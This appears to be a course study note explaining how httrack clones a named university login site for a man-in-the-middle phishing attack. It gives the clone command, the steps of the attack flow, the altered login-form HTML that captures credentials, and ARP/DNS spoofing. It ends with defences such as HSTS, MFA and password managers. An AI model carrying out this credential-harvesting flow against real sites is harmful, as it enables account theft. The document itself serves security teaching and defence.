What is httrack, and why is it useful for MitM phishing attacks?
httrack is a website mirror/copier — it follows links and downloads HTML, CSS, JS, images. The result: a perfect offline copy of a target site, ready to host as a phishing trap.
Basic usage:
httrack https://mycampus.hslu.ch -O /var/www/html/copy
It crawls the site, downloads everything, rewrites internal links so the local copy works.
Why it's perfect for phishing:
| Feature | Phishing benefit |
|---|---|
| Pixel-perfect copy | Looks identical to the real site |
| Includes assets (CSS, JS, images) | No broken-image red flags |
| Local link rewriting | Internal navigation works |
| Configurable depth | Can grab just the login page or the whole site |
The MitM phishing flow:
- Use
httrackto clonemycampus.hslu.ch - Modify the login form's
actionattribute to point to attacker's collector - Host the cloned site on attacker's webserver (e.g., Apache on Kali)
- Use ARP+DNS spoofing to redirect the victim to your fake site
- Victim logs in → credentials sent to attacker
- Optionally redirect to a fake "maintenance" page so user doesn't notice
The attacker's modification:
In the cloned index.html, change:
<form action="https://mycampus.hslu.ch/login.aspx" method="POST">
to:
<form action="http://mycampus.hslu.ch/de-ch/wartung.html" method="POST">
The credentials get posted to the attacker's local "wartung" (maintenance) page, which logs them and shows a fake "service down" message.
Why the URL still says mycampus.hslu.ch:
Because of DNS spoofing — the name resolves to the attacker, but the URL bar shows the legitimate domain. Visually, the victim is on mycampus.hslu.ch. Only HTTPS / cert mismatch would reveal the lie.
Defenses against this kind of phishing:
| Defense | How it helps |
|---|---|
| HTTPS + valid cert | Fake site can't show a valid cert for the real domain → browser warning |
| HSTS | Browser refuses HTTP for the domain after first HTTPS visit |
| Certificate Transparency | Issued certs are logged publicly → abuse easier to detect |
| MFA | Stolen password is useless without second factor |
| Password manager | Refuses to autofill on a different domain (notices URL mismatch) |
Tip: A password manager that won't autofill on a site that visually looks correct is a strong phishing signal — it's noticing something the human eye missed.
Go deeper:
HTTrack (Wikipedia) — the offline website copier, including link-rewriting that makes the clone self-contained.
Phishing (Wikipedia) — the credential-capture attack the cloned page serves, and its defenses.